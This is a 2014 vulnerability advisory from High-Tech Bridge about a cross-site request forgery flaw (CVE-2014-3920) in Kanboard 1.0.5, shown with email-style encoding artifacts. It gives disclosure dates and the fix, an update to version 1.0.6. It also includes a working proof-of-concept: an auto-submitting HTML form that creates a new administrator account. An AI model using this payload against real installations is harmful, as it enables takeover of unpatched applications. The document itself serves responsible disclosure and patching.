Cross-Site Request Forgery (CSRF) in Kanboard
Advisory ID: HTB23217
Product: Kanboard
Vendor: http://kanboard.net/
Vulnerable Version(s): 1.0.5 and probably prior
Tested Version: 1.0.5
Advisory Publication: May 28, 2014 [without technical details]
Vendor Notification: May 28, 2014=20
Vendor Patch: June 30, 2014=20
Public Disclosure: July 2, 2014=20
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-3920
Risk Level: Medium=20
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://w=
ww.htbridge.com/advisory/ )=20
---------------------------------------------------------------------------=
--------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Kanboard=
, which can be exploited to perform =D0=A1ross-Site Request Forgery (CSRF) =
attacks and gain complete control over the vulnerable application.
1. =D0=A1ross-Site Request Forgery (CSRF) in Kanboard: CVE-2014-3920
The vulnerability exists due to insufficient verification of the HTTP reque=
st origin. A remote attacker can trick a logged-in administrator of Kanboar=
d to visit a specially crafted web page with CSRF exploit code and create n=
ew account with administrative privileges.=20
Simple CSRF exploit below creates new admin account with login "immuniweb" =
and password "password":
<form action=3D"http://kanboard/?controller=3Duser&action=3Dsave" method=3D=
"post" name=3D"main">
<input type=3D"hidden" name=3D"username" value=3D"immuniweb">
<input type=3D"hidden" name=3D"name" value=3D"name">
<input type=3D"hidden" name=3D"email" value=3D"mail@mail.com">
<input type=3D"hidden" name=3D"password" value=3D"password">
<input type=3D"hidden" name=3D"confirmation" value=3D"password">
<input type=3D"hidden" name=3D"default_project_id" value=3D"0">
<input type=3D"hidden" name=3D"is_admin" value=3D"1">
<input type=3D"submit" id=3D"btn">
</form>
<script>
document.main.submit();
</script>
---------------------------------------------------------------------------=
--------------------
Solution:
Update to Kanboard 1.0.6
More Information:
http://kanboard.net/news
---------------------------------------------------------------------------=
--------------------
References:
[1] High-Tech Bridge Advisory HTB23217 - https://www.htbridge.com/advisory/=
HTB23217 - =D0=A1ross-Site Request Forgery (CSRF) in Kanboard.
[2] Kanboard - kanboard.net - A simple and open source visual task board
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - in=
ternational in scope and free for public use, CVE=C2=AE is a dictionary of =
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to =
developers and security practitioners, CWE is a formal list of software wea=
kness types.
[5] ImmuniWeb=C2=AE SaaS - https://www.htbridge.com/immuniweb/ - hybrid of =
manual web application penetration test and cutting-edge vulnerability scan=
ner available online via a Software-as-a-Service (SaaS) model.
---------------------------------------------------------------------------=
--------------------
Disclaimer: The information provided in this Advisory is provided "as is" a=
nd without any warranty of any kind. Details of this Advisory may be update=
d in order to provide as accurate information as possible. The latest versi=
on of the Advisory is available on web page [1] in the References.